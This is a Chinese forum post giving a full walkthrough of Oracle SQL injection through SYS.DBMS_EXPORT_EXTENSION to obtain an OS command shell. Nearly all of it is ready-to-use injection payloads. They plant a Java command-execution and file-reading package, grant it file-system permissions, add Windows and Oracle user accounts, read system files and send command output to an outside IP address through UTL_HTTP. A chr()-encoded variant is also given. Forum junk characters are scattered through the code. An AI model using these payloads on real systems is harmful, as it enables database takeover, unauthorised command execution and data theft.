
实例演示oracle注入获取cmdshell的全过程

发表于 2012-12-18 12:21:48 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
% ~7 o5 m- b! D4 Z( x7 I+ N& W. F
  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....) / p" }* j+ ^, v, u5 E, C
的形式即可。(用 'a'|| 是为了让语句返回 true 值)
语句有点长,可能要用 POST 提交。
以下是各个步骤:
1.创建包
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在 Oracle 上创建 Java 包 LinxUtil,里面有两个函数:runCMD 用于执行系统命令,readFile 用于读取文件:
/xxx.jsp?id=1 and '1'<>'a'||( & M" Z  D& ^9 _: ~2 Q. T0 H5 P4 }
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''# ]) q9 m6 p# m* l0 h
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
7 s" Q% ^: t0 Dnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}& S: g7 g: G# J- C8 X4 l" m; z) P
}'''';END;'';END;--','SYS',0,'1',0) from dual " a# ?- C: D3 b% E$ U+ l& Y( K' C
)
3 c# S7 O4 S# E; F: @: O) A------------------------
如果 URL 有长度限制,可以把 readFile() 函数块去掉,即:
/xxx.jsp?id=1 and '1'<>'a'||( 9 B$ T3 I( U$ f- ~3 h9 [) @
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
1 H# n4 v7 n6 t8 jcreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(4 Y, e9 X! x' G9 b% [3 r; w# {' }
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
8 D/ v* ^5 L7 k. ~/ Z}'''';END;'';END;--','SYS',0,'1',0) from dual . k2 ]6 o1 B9 H- S5 l/ ~( X0 s: V
)
" f/ D3 J8 X4 d+ h* v2 l3 L同时把后面步骤 提到的 对readFile()的处理语句去掉。 , T- I& x, f8 u% N
------------------------------   j6 b: n! e6 f+ L  ]- u1 x0 {
2.赋Java权限
/ x. r8 }0 {0 s' Lselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
3.创建函数
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
( B/ ~: j# _  \0 [create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual+ I9 ^! c0 e' W9 K) \( w
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''7 V/ A6 L* Y5 y9 }) k6 j! u+ }
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual8 b, V3 m; f$ J
4.赋 public 执行函数的权限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual! [4 x' @5 i0 |2 ?
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual& R" I5 J( _/ j5 f, {! c+ ^
5.测试上面的几步是否成功
and '1'<>'11'||(
  T1 ~; t/ f' w3 I8 F; Xselect  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD' 2 E* z5 N+ W7 G+ L9 v
) % P( n* G& W2 q: X+ t* ?
and '1'<>( 6 v2 Q( V2 R/ _/ Y! d6 q- G$ S
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE' * E# F, z" E' q
)
6.执行命令:
/xxx.jsp?id=1 and '1'<>( & j- _" T; F4 o- Y4 q9 i% q
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual & X& c2 I# {% e6 v, Y
) u5 I4 |8 K* V- e9 }
)
5 j7 M: }9 s/ W4 W1 h# l9 c  Q: ?: b/xxx.jsp?id=1 and '1'<>(
" M( r) o- P0 T! k/ b6 L( H1 c  F2 |select  sys.LinxReadFile('c:/boot.ini') from dual
$ e9 }- r- T, I7 v8 G, h: t7 B
& a6 v2 a4 a- I" i; y, ~' ])
$ ?$ S9 v6 p! \1 c* A1 Q  
注意 sys.LinxReadFile() 返回的是 varchar 类型,不能用 "and 1<>" 代替 "and '1'<>"。
如果要查看运行结果可以用 union:
/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual; X+ L$ U. U% `
或者用 UTL_HTTP.request():
/xxx.jsp?id=1 and '1'<>( / }: r& F: f; t
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual" E0 l9 A5 D* x/ B% R' q
)
$ E6 v: e& |& J% x% c4 c/xxx.jsp?id=1 and '1'<>(
9 U, m2 s& E& m( S. t+ n0 s. \% x; ESELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
' ?2 \6 C5 D1 T7 R: Y8 Z2 M)
注意:用 UTL_HTTP.request 时,要用 REPLACE() 把空格、换行符替换掉,否则无法提交 HTTP request。用 utl_encode.base64_encode 也可以。
-------------------- # k% W3 c; U% _
6.内部变化
通过以下命令可以查看 all_objects 表的改变:
select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%': E/ I9 t8 F6 \, p  ~
7.删除我们创建的函数
9 Q6 J  O$ R" Y! }! N/ nselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''- _0 S8 G6 }3 Y9 @# ]  r2 M
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual ; U  T4 n$ \& m& A7 F7 F
==================================================== 6 R& x9 A$ l3 _+ ?5 x# K" B, R/ [. T
全文结束。谨以此文赠与我的朋友。
+ A# `# s' t; B$ I* j. M0 ulinx
; \4 L9 E  L% x. G124829445 - B7 K" z6 V4 W  N7 G% z5 `( C2 E
2008.1.12 ! g1 ~  T5 Z4 |: E  f7 W$ H
linyujian@bjfu.edu.cn
1 Z7 Z/ \! X* C9 D' A6 ^======================================================================
测试漏洞的另一方法:
创建 oracle 帐号:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''8 s* ~7 @. u* Y7 o& }& G& |" ~
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual6 ^$ j$ x! R$ h; z
即:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),7 r: M- m4 ~8 o3 X5 Z3 r
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual / i! U. E) k0 M$ _7 Y
确定漏洞存在:
1<>( 1 S1 a* j2 M3 }7 ~8 a& Q
select user_id from all_users where username='LINXSQL' & U% f/ x# S# ~( r7 _
) " Z4 b) k3 _  C1 n3 [6 p' g8 T
给linxsql连接权限:
5 J0 e$ ?/ m2 W9 _% y, s4 h% Iselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''8 G. l  O  A$ Y2 S9 o; \
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
删除帐号:
9 J2 Q( _4 [: K# ]1 I2 y5 }select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
' i4 M! A; ~) {4 h) vdrop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual & \+ A1 h; y* e2 U5 S
======================
以下方法创建一个可以执行多语句的函数 Linx_query(),执行成功的话返回数值 "1";但权限是继承的,可能仅仅是 public 权限,作用似乎不大,真的要用的话可以考虑 grant dba to 当前的 User:
; d% J& V) q2 |; N; U1.jsp?id=1 and '1'<>( % W9 ^* d1 ^* V. n8 H
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
1 D  u: n7 C! G6 }$ ]( @create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual* `" U. }& [+ F& F4 [
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE) _5 X$ x! D3 ~* e$ X# ~" Z
 ), \2 X/ N9 c" W9 U" ]
